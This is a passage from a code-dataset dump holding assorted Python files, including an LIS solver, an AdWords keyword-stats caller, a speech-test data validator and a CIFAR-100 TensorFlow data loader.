self.graph[v]:\r\n\t\t\tif not visited[u]:\r\n\t\t\t\tgraph.addGroup(v, u)\r\n\t\t\t\tself.connectedComponentsUtil(u, visited, graph)\r\n","sub_path":"loop.py","file_name":"loop.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"452717876","text":"\"\"\"\nGiven an unsorted array of integers, find the length of longest increasing subsequence.\n\nExample:\nInput: [10,9,2,5,3,7,101,18]\nOutput: 4 \nExplanation: The longest increasing subsequence is [2,3,7,101], therefore the length is 4. \nNote:\n\nThere may be more than one LIS combination, it is only necessary for you to return the length.\nYour algorithm should run in O(n^2) complexity.\n\"\"\"\nclass Solution(object):\n    def lengthOfLIS(self, nums):\n        \"\"\"\n        :type nums: List[int]\n        :rtype: int\n        \"\"\"\n        \n        n = len(nums)\n        \n        if n == 0:\n            return n\n\n        maxLen = 1\n        DP = [1 for i in range(n)]\n        \n\n        for i in range(1, n):\n            for j in range(i):\n                if nums[j] < nums[i]:\n                    DP[i] = max(DP[j] + 1, DP[i])\n                    maxLen = max(DP[i], maxLen)\n        return maxLen\n\n\"\"\"\nExplanation\n\nif nums is empty, then the longest increasing subsequence is 0, otherwise it's 1 initially (i.e. 1 character)\n\nWe use an array of length n filled with 1's since the longest increasing subsequence of a single character is 1.\n\nThis question is essentially asking what's the largest sequence of numbers such that they're sorted.\n\nFor each element, we loop through all prior elements and check them against the current element we're on.\nIf the prior element is less than the current, the longest increasing subsequence is the max between the longest increasing\nsubsequence at that point at j + 1 or the current index.\n\nWe use a variable to track the maxLen which updates whenever we update DP[i] and we return maxLen at the end\n\n\n\n\"\"\"","sub_path":"Dynamic Programming/300_longest_increasing_subsequence.py","file_name":"300_longest_increasing_subsequence.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"365871157","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 3 12:55:15 2019\n\n@author: krzysztofwielocha\n\"\"\"\n\nimport numpy as np\n\ndef diff(A): \n    B1=(A[1:-2,1:-2]>A[0:-3,1:-2])\n    B2=(A[1:-2,1:-2]>A[2:-1,1:-2])\n    B3=(A[1:-2,1:-2]>A[1:-2,0:-3])\n    B4=(A[1:-2,1:-2]>A[1:-2,2:-1])\n    \n    B=B1*B2*B3*B4\n    \n    B=B*(A[1:-2,1:-2]>3)\n    \n    C= np.zeros((256,256))\n    \n    C[1:-2,1:-2]=B\n    \n    return C\n\ndef locs(Tp,Tv):\n    P = []\n    Q = []\n    cp = []\n    cq = []\n    for i in range(len(Tp)):\n        P.append(diff(Tp[i].reshape((256,256))))\n        cp.append(np.where(P[i]))\n        Q.append(diff(Tv[i].reshape((256,256))))\n        cq.append(np.where(Q[i]))\n    \n    \n    return np.array(P),np.array(Q), cp, cq\n\ndef precc(yp,yt):\n    tp = 0\n    tn = 0\n    for i in range(len(yp)):\n        \n        if len(yp[i][0]) == len(yt[i][0]) and len(yp[i][1]) == len(yt[i][1]):\n            tp += len(yp[i][0])\n#            print(i)\n            \n        elif (len(yp[i][0]) > len(yt[i][0])) and (len(yp[i][1]) > len(yt[i][1])):\n            tp += len(yp[i][0])\n            tn += np.abs(len(yp[i][0]) - len(yt[i][0]))\n#            print(i ,' dupa! 
',fn,' ', np.abs(len(yp[i][0]) - len(yt[i][0])))\n else: continue\n# print(tp,' ',fn)\n prec = tp/(tp+tn)\n return prec\n\ndef recc(yp,yt):\n tp = 0\n fn = 0\n for i in range(len(yp)):\n \n if len(yp[i][0]) == len(yt[i][0]) and len(yp[i][1]) == len(yt[i][1]):\n tp += len(yp[i][0])\n# print(i)\n \n elif (len(yp[i][0]) < len(yt[i][0])) and (len(yp[i][1]) < len(yt[i][1])):\n tp += len(yp[i][0])\n fn += np.abs(len(yp[i][0]) - len(yt[i][0]))\n# print(i ,' dupa! ',fn,' ', np.abs(len(yp[i][0]) - len(yt[i][0])))\n else: continue\n# print(tp,' ',fn)\n rec = tp/(tp+fn)\n return rec\n\ndef ff1(yp,yt):\n precision = precc(yp, yt)\n recall = recc(yp, yt)\n return 2*((precision*recall)/(precision+recall))","sub_path":"funky_f1.py","file_name":"funky_f1.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"219430276","text":"from googleads import adwords\nimport os\n\n#Requires a .yaml file from the adwords developers section before it will work \nyaml_loc = os.path.join(os.getcwd(), \"server\", \"Apps\", \"SearchLens\", \"modules\", \"googleads.yaml\")\n\nPAGE_SIZE = 500\nattributeList = ['KEYWORD_TEXT', 'SEARCH_VOLUME', 'CATEGORY_PRODUCTS_AND_SERVICES', 'COMPETITION', 'AVERAGE_CPC', 'TARGETED_MONTHLY_SEARCHES']\n\ndef build_selector(ideaType, requestType, queryList, attributeList = attributeList, offset = 0, PAGE_SIZE = PAGE_SIZE,\n network = None, language_id = None, location_id = None, ad_group_id = None):\n \"\"\"\n Returns a selector used by the TargetingIdeaService to get keywords related to query.\n\n Parameters:\n\n ideaType: String. \n requestType: String.\n attributeList: String List.\n queryList: String list of the words used to get suggestions from.\n offset: Int.\n PAGE_SIZE: Int. How many results to pull down at once.\n network (optional setting): Dictionary. Should be filled out in this example format:\n\n 'targetGoogleSearch' : True,\n 'targetSearchNetwork' : False,\n 'targetContentNetwork' : False,\n 'targetPartnerSearchNetwork' : False\n\n language_id (optional setting): String. IDs can be found in google documentation here https://developers.google.com/adwords/api/docs/appendix/languagecodes.\n ad_group_id (optional setting): String. 
Used to set SearchAdGroupID parameter.\n\n \"\"\"\n selector = {\n 'ideaType' : ideaType,\n 'requestType' : requestType\n }\n\n selector['requestedAttributeTypes'] = attributeList\n\n selector['paging'] ={\n 'startIndex' : str(offset),\n 'numberResults' : str(PAGE_SIZE)\n }\n\n selector['searchParameters'] = [{\n 'xsi_type' : 'RelatedToQuerySearchParameter', #This could be changed to allow a more abstract method\n 'queries' : queryList\n }]\n\n if network:\n selector['searchParameters'].append({\n 'xsi_type' : 'NetworkSearchParameter',\n 'networkSetting' : network\n })\n\n if language_id:\n selector['searchParameters'].append({\n 'xsi_type' : 'LanguageSearchParameter',\n 'languages' : [{'id' : language_id}] #TODO: Update to reflect that multiple languages can be taken\n })\n\n if ad_group_id:\n selector['searchParameters'].append({\n 'xsi_type' : 'SeedAdGroupIdSearchParameter',\n 'adGroupId' : ad_group_id\n })\n\n if location_id:\n selector['searchParameters'].append({\n 'xsi_type' : 'LocationSearchParameter',\n 'locations' : [{'id' : location_id}]\n })\n\n return selector\n\ndef get_keyword_data(selector, targeting_service, offset = 0, PAGE_SIZE = PAGE_SIZE, exclusion_list = [], parent_keyword = None):\n \"\"\"\n Returns a dictionary of the format Keyword : Category Int, Search Volume, Competition, Average cost per click, Monthly Searches, Parent Keyword\n\n Parameters:\n\n selector: A selector dictionary. Available from build_selector.\n targeting_service: An adwords client method. (client.GetService('TargetingIdeaService'))\n offset: Int. Used for paging.\n PAGE_SIZE: Int. How many results are pulled back at once.\n \"\"\"\n more_pages = True\n keyword_data = {}\n\n while more_pages:\n page = targeting_service.get(selector)\n\n if 'entries' in page:\n for result in page['entries']:\n attributes = {}\n for trait in result['data']:\n attributes[trait['key']] = getattr(trait['value'], 'value', '0')\n\n if attributes['KEYWORD_TEXT'] not in exclusion_list:\n keyword_data[attributes['KEYWORD_TEXT']] = {\"Category\" : attributes['CATEGORY_PRODUCTS_AND_SERVICES'],\"Search Volume\" : attributes['SEARCH_VOLUME'],\n \"Competition\" : attributes['COMPETITION'], \"CPC\" : attributes['AVERAGE_CPC'], \"Monthly Searches\" : attributes['TARGETED_MONTHLY_SEARCHES']}\n\n if parent_keyword:\n keyword_data[attributes['KEYWORD_TEXT']]['Parent Keyword'] = [str(parent_keyword)]\n else:\n keyword_data[attributes['KEYWORD_TEXT']]['Parent Keyword'] = [str(attributes['KEYWORD_TEXT'])]\n\n offset += PAGE_SIZE\n selector['paging']['startIndex'] = str(offset)\n more_pages = offset < int(page['totalNumEntries'])\n\n return keyword_data\n\ndef keyword_suggestion_stats(queryList, network = None, language_id = None, location_id = None, ad_group_id = None, only_keyword_stats = False, exclusion_list = []):\n \"\"\"\n Initialises the adwords api client and returns a dictionary of keyword suggestions and their statistics.\n The stats_selector part is used to append the statistics of the keywords that the user inputs.\n\n Parameters:\n\n queryList: String List. A list of keywords to query.\n network (optional setting): Dictionary. Should be filled out in this example format:\n\n 'targetGoogleSearch' : True,\n 'targetSearchNetwork' : False,\n 'targetContentNetwork' : False,\n 'targetPartnerSearchNetwork' : False\n\n language_id (optional setting): String. IDs can be found in google documentation here https://developers.google.com/adwords/api/docs/appendix/languagecodes.\n ad_group_id (optional setting): String. 
Used to set SearchAdGroupID parameter.\n keyword_suggestions\n \"\"\"\n\n #-------------------------INVESTIGATE WHETHER THIS CAN BE CHANGED TO GENERATE CREDENTIALS BASED ON A USER LOGGING IN---------------------------#\n adwords_client = adwords.AdWordsClient.LoadFromStorage(yaml_loc)\n\n targeting_idea_service = adwords_client.GetService('TargetingIdeaService', version='v201809')\n stats_selector = build_selector(ideaType = 'KEYWORD', requestType = 'STATS', queryList = queryList, network = network, language_id = language_id, location_id = location_id)\n\n stats = get_keyword_data(selector = stats_selector, targeting_service = targeting_idea_service, exclusion_list = exclusion_list)\n\n if not only_keyword_stats:\n suggestion_selector = build_selector(ideaType = 'KEYWORD', requestType = 'IDEAS', queryList = queryList, network = network, language_id = language_id, location_id = location_id)\n suggestions = get_keyword_data(selector = suggestion_selector, targeting_service = targeting_idea_service, exclusion_list = exclusion_list, parent_keyword = queryList[0])\n keywords = {**stats, **suggestions}\n\n else:\n keywords = stats\n\n return keywords","sub_path":"server/Apps/SearchLens/modules/adwords/api_caller.py","file_name":"api_caller.py","file_ext":"py","file_size_in_byte":6624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"168790157","text":"# -*- coding: utf-8 -*-\nimport pymongo\n\nfrom .db_event import DBEvent\nfrom ...settings import *\n\n\nclass DBMatch(DBEvent):\n \"\"\"Class responsible to control all the search of matches\n in the ```Events``` collection\"\"\"\n def select_events(self):\n \"\"\"Return all the Events in the collection\"\"\"\n return self.db_collection.find({}, {'_id': 0})\n\n def select_event_by_name(self, event_name=None):\n \"\"\"Return the event that have the specified name or return False\"\"\"\n return self.db_collection.find_one(\n {'name': event_name}, DB_FIELDS_RETURN\n )\n\n def select_event_by_sport(self, sport=None, ordering=None):\n \"\"\"Return a list of all the event with the sport name, if ordering\n specified order the result by this field\"\"\"\n events = None\n\n if ordering:\n events = self.db_collection.find(\n {'sport.name': sport}, DB_FIELDS_RETURN\n ).sort([(ordering, pymongo.ASCENDING)])\n else:\n events = self.db_collection.find(\n {'sport.name': sport}, DB_FIELDS_RETURN\n )\n\n return events\n","sub_path":"api_888_interview/api/src/database/db_match.py","file_name":"db_match.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"300953571","text":"#!/usr/bin/python2.7\nimport sys, re, time, os, zipfile, subprocess, collections\nfrom optparse import OptionParser\n\ndef main():\n\n usage='''%prog [opts] \n\n This tool will validate the specified DST file and parallel CSV and contact-TSV files\n when using the default options. If you are validating a test that does not have a CSV\n or contact/music/etc. per-user metadata, then you must specify this in the options.\n\n Assuming the default options, then logic is to first check for lmetsv file and \n validate that. If it is fine, the lme dir/grxml dir will not be checked. 
 If you\n    want to explicitly check the grxml dir, point to it with --lmedir\n\n    Validation checks are\n        DST: all audio files exist, are readable, are non-empty, and are valid zip files\n        DST: all subfiles in the DST exist in the zip files\n        DST: all sample rates are the same (don't mix 8k and 16k)\n        CSV: user, nmaid, transcription, and fieldID columns exist and non-empty\n        CSV: number of columns match for all lines\n        LMEDir: grxml file exists for all users and is valid xml\n        LMEDir: counts empty grxml files and average number of contacts\n        LMETsv: contact columns are in correct order with correct names\n        LMETsv: contacts entries are non-empty\n        LMETsv: contacts for a user are all contiguous in the file (requirement for ACC)\n'''\n    parser = OptionParser(usage=usage)\n    parser.add_option('-c', '--csv', action=\"store\", help='use this CSV [default: find from dst]')\n    parser.add_option('-g', '--lmedir', action=\"store\", help='use this dir with .grxml files [default: find from dst]')\n    parser.add_option('-t', '--lmetsv', action=\"store\", help='use this file for user-specific data [default: find from dst]')\n    parser.add_option('--nocsv', default=False, action=\"store_true\", help='do not check for a CSV')\n    parser.add_option('--nolme', default=False, action=\"store_true\", help='do not check for lme dir/files')\n    parser.add_option('-v', '--verbose', action=\"store_true\", help='print more info')\n    opts, args = parser.parse_args()\n\n    if len(args) != 1:\n        sys.stderr.write(\"expecting one argument but found %d\\n\" % len(args)); sys.exit(1)\n    dstFile = args[0]\n    if not dstFile.endswith('.dst'):\n        sys.stderr.write(\"dst file does not end with '.dst'. Exiting\\n\"); sys.exit(1)\n\n    total_errors = total_warnings = 0\n    global users; users = set()\n    testname = os.path.basename(dstFile).split(\".\")[0]\n\n    log(\"===========================================================\\nValidating DST: %s\\n\" % dstFile)\n    if not os.path.isfile(dstFile): log(\"ERROR: %s does not exist or is not readable\\n\" % dstFile); total_errors += 1\n    else: (e, w) = validate_DST(dstFile, opts.verbose); total_errors += e; total_warnings += w\n\n    if not opts.nocsv:\n        csvFile = opts.csv if opts.csv else re.sub('dst$','csv',dstFile)\n        log(\"===========================================================\\nValidating CSV: %s\\n\" % csvFile)\n        if not os.path.isfile(csvFile): log(\"ERROR: %s does not exist or is not readable\\n\" % csvFile); total_errors += 1\n        else: (e, w) = validate_CSV(csvFile); total_errors += e; total_warnings += w\n\n    if not opts.nolme:\n        # first check lme tsv\n        hasTsv=hasGrxml=True\n        grxmlDir = opts.lmedir if opts.lmedir else dstFile.replace('/dstfiles/','/grxml/').replace('.utf8.dst','')\n        tsvFile = opts.lmetsv if opts.lmetsv else os.path.join(grxmlDir, testname + '.utf8.tsv')\n        log(\"===========================================================\\nValidating LME TSV: %s\\n\" % tsvFile)\n        if not os.path.isfile(tsvFile): log(\"WARNING: %s does not exist or is not readable\\n\" % tsvFile); total_warnings += 1; hasTsv=False\n        else: (e, w) = validate_TSV(tsvFile); total_errors += e; total_warnings += w\n\n        # only check grxml dir if no TSV or user asks for it (via opts.lmedir)\n        if not hasTsv or opts.lmedir:\n            log(\"===========================================================\\nValidating LME/GRXML dir: %s\\n\" % grxmlDir)\n            if not os.path.isdir(grxmlDir): log(\"WARNING: %s does not exist or is not readable\\n\" % grxmlDir); total_warnings += 1; hasGrxml=False\n            else: (e, w) = validate_GRXML(grxmlDir); total_errors += e; 
total_warnings += w\n\n if not hasTsv and not hasGrxml:\n log(\"ERROR: no GRXML directory or TSV file\\n\"); total_errors += 1\n\n log(\"===========================================================\\n\")\n log(\"TOTAL ERRORS: %d\\n\" % total_errors)\n log(\"TOTAL WARNINGS: %d\\n\" % total_warnings)\n\n exit(total_errors > 0)\n\ndef log(str):\n sys.stdout.write(str)\n sys.stdout.flush()\n\ndef findDelim(text):\n nComma = len(re.findall(',',text))\n nTab = len(re.findall('\\t',text))\n if nComma == 0 and nTab == 0: return None\n if nComma > nTab: return ','\n return '\\t'\n\ndef validate_DST(fn, verbose):\n global users\n errors = warnings = 0\n path_re = re.compile(r'^PATH (\\S+)=(\\S+)/([^/]+)$')\n file_re = re.compile(r'^FILE (\\S+) . (\\S+) (\\S+) \\S+$')\n utt_re = re.compile(r'^(\\S+) [0-9\\.]+$')\n\n dst = open(fn)\n\n paths = []\n dst_utts = 0\n sample_rate_counts = collections.defaultdict(int)\n\n for line in dst.readlines():\n line = line.strip()\n if path_re.match(line):\n m = path_re.match(line)\n paths.append((m.group(1), m.group(2), m.group(3)))\n if file_re.match(line):\n m = file_re.match(line)\n user_zip_contents = {}\n audio_zip_name = None\n users.add(m.group(2))\n for path in paths:\n user_zip_name = os.path.join(path[1], m.group(1)+path[2])\n if not os.path.isfile(user_zip_name):\n sys.stdout.write(\"ERROR: %s not found\\n\" % user_zip_name); errors += 1\n elif ((os.path.getsize(user_zip_name) == 0) or (not os.access(user_zip_name, os.R_OK))):\n sys.stdout.write(\"ERROR: %s is empty or not readable\\n\" % user_zip_name); errors += 1\n elif not zipfile.is_zipfile(user_zip_name):\n sys.stdout.write(\"ERROR: %s is not a valid zip file\\n\" % user_zip_name); errors += 1\n elif path[2] == '.nwv.zip':\n try:\n user_zip = zipfile.ZipFile(user_zip_name)\n except:\n sys.stdout.write(\"ERROR: exception caught reading %s\\n\" % user_zip_name)\n errors += 1\n audio_zip_name = user_zip_name\n if utt_re.match(line):\n wav_fn = utt_re.match(line).group(1) + '.nwv'\n if audio_zip_name:\n audio_zip = zipfile.ZipFile(audio_zip_name)\n if wav_fn not in audio_zip.namelist():\n sys.stdout.write(\"ERROR: audio file %s not found in zip archive %s\\n\" % (wav_fn, audio_zip_name)); errors += 1\n else:\n nwv = audio_zip.open(wav_fn)\n sample_rate = None\n for line in nwv.readlines():\n if line.startswith('sample_rate'):\n sample_rate = int(line.split()[2])\n break\n if verbose and sample_rate != 16000:\n sys.stdout.write(\"SAMPLE RATE: file %s in archive %s has sample rate %d\\n\" % (wav_fn, audio_zip_name, sample_rate))\n sample_rate_counts[sample_rate] += 1\n dst_utts += 1\n\n sys.stdout.write(\"number speakers: %d\\n\" % len(users))\n sys.stdout.write(\"number utterances: %d\\n\" % dst_utts)\n for s in sample_rate_counts.keys():\n num = sample_rate_counts[s]\n pct = 100.0 * sample_rate_counts[s]/dst_utts\n sys.stdout.write(\"\\t%d at %d Hz (%.2f%%)\\n\" % (num, s, pct))\n if len(sample_rate_counts.keys()) > 1:\n sys.stdout.write(\"ERROR: multiple sample rates in test\"); errors += 1\n if not verbose: sys.stdout.write(\". 
Run with -v for list of non-16kHz audio zips\")\n sys.stdout.write('\\n')\n sys.stdout.write(\"\\n\")\n sys.stdout.write(\"DST validation complete with %d errors and %d warnings\\n\" % (errors, warnings))\n sys.stdout.flush()\n return (errors, warnings)\n\ndef validate_CSV(fn):\n errors = warnings = 0\n\n csvData=open(fn).readlines()\n\n delim = findDelim(csvData[0])\n cols = csvData[0].split(delim)\n indexMap = {}\n for i,val in enumerate(cols):\n indexMap[val]=i\n\n for reqCol in ['user','nmaid','transcription']:\n if reqCol not in indexMap: sys.stdout.write(\"ERROR: column '%s' not found in CSV\\n\" % reqCol); errors += 1\n if 'fieldID' not in indexMap and 'fieldId' not in indexMap and 'field_id' not in indexMap:\n sys.stdout.write(\"ERROR: column 'fieldId' or 'field_id' not found in CSV\\n\"); errors += 1\n\n # the header value changes in different files\n fieldIdHeader = 'fieldId'\n if 'field_id' in indexMap: fieldIdHeader = 'field_id'\n if 'fieldID' in indexMap: fieldIdHeader = 'fieldID'\n\n nCsvLines = len(csvData)-1\n blankFieldId = contactUtts = 0\n userCounts = collections.defaultdict(int)\n nmaidCounts = collections.defaultdict(int)\n\n # iterate over non-header lines in the CSV\n for line in csvData[1:]:\n toks = line.split(delim)\n if len(toks) != len(indexMap):\n sys.stdout.write(\"WARNING: number of columns don't match in line '%s'\\n\" % line); warnings += 1\n continue\n\n # count blank fieldId values ... we don't want any in SVoice, DMA or Genie\n if toks[indexMap[fieldIdHeader]].strip() == '': blankFieldId += 1\n\n user = toks[indexMap['user']]\n userCounts[user] += 1\n\n nmaid = toks[indexMap['nmaid']]\n nmaidCounts[nmaid] += 1\n\n trans = toks[indexMap['transcription']]\n if '\\\\contact' in trans: contactUtts += 1\n\n sys.stdout.write(\"number speakers: %d\\n\" % len(userCounts))\n sys.stdout.write(\"number utterances: %d\\n\" % nCsvLines)\n sys.stdout.write(\"fieldID column header: %s\\n\" % fieldIdHeader)\n sys.stdout.write(\"number empty fieldID values: %d (%0.1f%%)\\n\" % (blankFieldId, float(blankFieldId)/nCsvLines*100))\n sys.stdout.write(\"utterances with \\\\contact: %d (%0.1f%%)\\n\" % (contactUtts, float(contactUtts)/nCsvLines*100))\n sys.stdout.write(\"speakers with most utterances:\\n\")\n for count,user in countDictToList(userCounts)[:10]:\n sys.stdout.write(\"\\t%d\\t%0.1f%%\\t%s\\n\" % (count, float(count)/nCsvLines*100, user))\n sys.stdout.write(\"NMAID distribution:\\n\")\n for count,nmaid in countDictToList(nmaidCounts):\n sys.stdout.write(\"\\t%d\\t%0.1f%%\\t%s\\n\" % (count, float(count)/nCsvLines*100, nmaid))\n\n # also run ACC perfReport script that can validate CSV files\n # os.system('python /amr/tools/acc/mrec26.100/16070/moduleScripts/perfReports.py --verify '+csvFile)\n # this script doesn't handle encodings/wide chars well and mistakenly thinks fields are missing/added...\n\n sys.stdout.write(\"\\nCSV validation complete with %d errors and %d warnings\\n\" % (errors, warnings))\n sys.stdout.flush()\n return (errors, warnings)\n\ndef validate_GRXML(dir):\n global users\n errors = warnings = 0\n contact_re = re.compile(r'CONTACT_NAME=\"')\n\n missingGrxml = emptyGrxml = totalContacts = 0\n for user in users:\n grxml = \"%s/%s.grxml\" % (dir, user)\n if os.path.isfile(grxml):\n nContacts = 0\n for line in open(grxml):\n if contact_re.search(line):\n nContacts += 1\n if nContacts == 0: emptyGrxml += 1\n totalContacts += nContacts\n if os.path.getsize(grxml) == 0:\n sys.stdout.write(\"ERROR: %s has length 0\\n\" % grxml); errors += 1\n else:\n 
sys.stdout.write(\"ERROR: grxml not found: %s\\n\" % grxml); errors += 1\n missingGrxml += 1\n\n sys.stdout.write(\"number missing grxml files: %d (%0.1f%%)\\n\" % (missingGrxml, float(missingGrxml)/len(users)*100))\n sys.stdout.write(\"number empty grxml files: %d (%0.1f%%)\\n\" % (emptyGrxml, float(emptyGrxml)/len(users)*100))\n nNotEmpty = len(users) - missingGrxml - emptyGrxml\n avg=0\n if nNotEmpty > 0: avg=float(totalContacts) / nNotEmpty\n sys.stdout.write(\"average contacts per non-empty-grxml user: %0.1f\\n\" % avg)\n\n sys.stdout.write(\"\\nGRXML validation complete with %d errors and %d warnings\\n\" % (errors, warnings))\n sys.stdout.flush()\n return (errors, warnings)\n\ndef validate_TSV(fn):\n global users\n errors = warnings = 0\n\n f = open(fn)\n header = f.readline().strip().split('\\t')\n if not ('user' in header and 'content_type' in header and 'content' in header):\n sys.stdout.write(\"ERROR: %s missing header or does not contain user, content, and content_type columns\\n\" % fn); errors += 1; return (errors, warnings)\n line_num = 0\n\n last_user = None\n user_contact_counts = collections.defaultdict(int)\n while True:\n line = f.readline()\n if not line: break\n line_num += 1\n if line.strip() == '': continue\n\n data = dict(zip(header, line.strip().split('\\t')))\n\n if data['user'] != last_user:\n if data['user'] in user_contact_counts: sys.stdout.write(\"ERROR: non-contiguous entries for user %s\\n\" % data['user']); errors += 1\n last_user = data['user']\n\n if data['content_type'] == 'contacts': user_contact_counts[data['user']] += 1\n\n if data['content_type'] == 'contacts' and data['content'] == '{}':\n sys.stdout.write(\"ERROR: empty contacts content field for user %s at line %d\\n\" % (data['user'], line_num)); errors += 1\n\n num_no_contacts = 0\n total_contacts = 0\n for user in users:\n if user_contact_counts[user] == 0:\n # sys.stdout.write(\"WARNING: no contact lines in TSV for user %s\\n\" % user); warnings += 1\n num_no_contacts += 1\n else:\n total_contacts += user_contact_counts[user]\n\n avg = 0.0 if len(users) == num_no_contacts else float(total_contacts)/(len(users) - num_no_contacts)\n sys.stdout.write(\"number of users with no contact lines in TSV: %d\\n\" % num_no_contacts)\n sys.stdout.write(\"average contacts per non-empty user: %0.1f\\n\" % avg)\n\n sys.stdout.write(\"\\nTSV validation complete with %d errors and %d warnings\\n\" % (errors, warnings))\n sys.stdout.flush()\n return (errors, warnings)\n\ndef countDictToList(d):\n dList=[(count,val) for val,count in d.items()]\n dList.sort(reverse=True)\n return dList\n\nif __name__ == '__main__':\n main()\n","sub_path":"tools/scripts/validateTest.py","file_name":"validateTest.py","file_ext":"py","file_size_in_byte":14646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"307984864","text":"from model.mongodb import conn_mongodb\nfrom datetime import datetime\n\nclass BlogSession():\n blog_page = {'A':'indexA.html', 'B':'indexB.html'}\n session_count = 0\n\n @staticmethod #접속에 관한 정보 저장\n def save_session_info(session_ip, user_email, webpage_name):\n now = datetime.now()\n now_time = now.strftime(\"%d/%m/%Y %H:%M:%S\")\n\n mongo_db = conn_mongodb()\n mongo_db.insert_one({\n 'session_ip':session_ip\n ,'user_email':user_email\n ,'page':webpage_name\n ,'access_time':now_time\n })\n # session_ip / user_email / page / access_time\n\n @staticmethod #인자 넣기 (force=None)\n def get_blog_page(blog_id=None):\n if blog_id == None:\n if 
BlogSession.session_count == 0:\n BlogSession.session_count = 1\n return BlogSession.blog_page['A']\n else:\n BlogSession.session_count = 0\n return BlogSession.blog_page['B']\n else:\n return BlogSession.blog_page[blog_id]\n","sub_path":"flask_project/project_abtest/control/session_manage.py","file_name":"session_manage.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"103090111","text":"import os\nimport subprocess\nimport string\nimport time\nimport pytest\n\n\n\ndef is_in(parentlist, sublist):\n parentlist = parentlist.replace(\" \",\"\")\n sublist = sublist.replace(\" \",\"\")\n return sublist in parentlist\n\nif __name__ == \"__main__\":\n wrong = 0\n start_time = time.time()\n flag = False\n for i in range(12):\n try:\n ans_f = open('ans%d.txt'%i)\n ans = ans_f.read()\n result = subprocess.check_output('python nonogram.py test%d.txt'%i, shell=True)\n if not is_in(result,ans):\n wrong = wrong + 1\n except:\n wrong = wrong + 1\n if (wrong == 0):\n flag = True\nprint(\"[PYGGI_RESULT] {runtime: %f,pass_all: %s}\"%(time.time() - start_time,flag))\n#print(\"[PYGGI_RESULT] {runtime: \"+str(run_time)+)","sub_path":"pyggi_hj/example/verifier_2.py","file_name":"verifier_2.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"20678857","text":"\"\"\"Create the input data pipeline using `tf` and `np`\"\"\"\nimport sys\n\nsys.path.extend(['..'])\n\nimport pickle\n\nimport tensorflow as tf\nimport numpy as np\n\nfrom utils.utils import get_args\nfrom utils.config import process_config\n\n\nclass Cifar100DataLoaderNumpy:\n \"\"\"\n It will load the numpy files from the pkl file which is dumped by prepare_cifar100.py script\n Please make sure that you have included all of the needed config\n \"\"\"\n\n def __init__(self, config):\n self.config = config\n\n with open('../data/cifar100/cifar-100-python/data_numpy.pkl', 'rb') as f:\n self.data_pkl = pickle.load(f)\n\n self.x_train = self.data_pkl['x_train']\n self.y_train = self.data_pkl['y_train']\n self.x_test = self.data_pkl['x_test']\n self.y_test = self.data_pkl['y_test']\n\n print('x_train: ', self.x_train.shape, self.x_train.dtype)\n print('y_train: ', self.y_train.shape, self.y_train.dtype)\n print('x_test: ', self.x_test.shape, self.x_test.dtype)\n print('y_test: ', self.y_test.shape, self.y_test.dtype)\n\n self.train_len = self.x_train.shape[0]\n self.test_len = self.x_test.shape[0]\n\n self.num_iterations_train = (self.train_len + self.config.batch_size - 1) // self.config.batch_size\n self.num_iterations_test = (self.test_len + self.config.batch_size - 1) // self.config.batch_size\n\n print('Data loaded successfully..')\n\n self.features_placeholder = None\n self.labels_placeholder = None\n\n self.dataset = None\n self.iterator = None\n self.init_iterator_op = None\n self.next_batch = None\n\n self._build_dataset_api()\n\n\n def _build_dataset_api(self):\n with tf.device('/cpu:0'):\n self.features_placeholder = tf.placeholder(tf.float32, [None] + list(self.x_train.shape[1:]))\n self.labels_placeholder = tf.placeholder(tf.int64, [None, ])\n\n self.dataset = tf.data.Dataset.from_tensor_slices((self.features_placeholder, self.labels_placeholder))\n self.dataset = self.dataset.batch(self.config.batch_size)\n\n self.iterator = tf.data.Iterator.from_structure(self.dataset.output_types,\n self.dataset.output_shapes)\n\n self.init_iterator_op = 
self.iterator.make_initializer(self.dataset)\n\n self.next_batch = self.iterator.get_next()\n\n print('X_batch shape dtype: ', self.next_batch[0].shape)\n print('Y_batch shape dtype: ', self.next_batch[1].shape)\n\n\n def initialize(self, sess, mode='train'):\n if mode == 'train':\n idx = np.random.choice(self.train_len, self.train_len, replace=False)\n self.x_train = self.x_train[idx]\n self.y_train = self.y_train[idx]\n\n print(self.x_train.shape)\n print(self.y_train.shape)\n sess.run(self.init_iterator_op, feed_dict={self.features_placeholder: self.x_train,\n self.labels_placeholder: self.y_train})\n else:\n sess.run(self.init_iterator_op, feed_dict={self.features_placeholder: self.x_test,\n self.labels_placeholder: self.y_test})\n\n\n def get_inputs(self):\n return self.next_batch\n\n\ndef main(config):\n \"\"\"\n Function to test from console\n :param config:\n :return:\n \"\"\"\n tf.reset_default_graph()\n\n sess = tf.Session()\n\n data_loader = Cifar100DataLoaderNumpy(config)\n\n x, y = data_loader.get_inputs()\n\n print('Train')\n data_loader.initialize(sess, mode='train')\n\n out_x, out_y = sess.run([x, y])\n\n print(out_x.shape, out_x.dtype)\n print(out_y.shape, out_y.dtype)\n\n print('Test')\n data_loader.initialize(sess, mode='test')\n\n out_x, out_y = sess.run([x, y])\n\n print(out_x.shape, out_x.dtype)\n print(out_y.shape, out_y.dtype)\n\n\nif __name__ == '__main__':\n # capture the config path from the run arguments\n # then process the json configuration file\n try:\n args = get_args()\n config = process_config(args.config)\n main(config)\n\n except Exception as e:\n print('Missing or invalid arguments %s' % 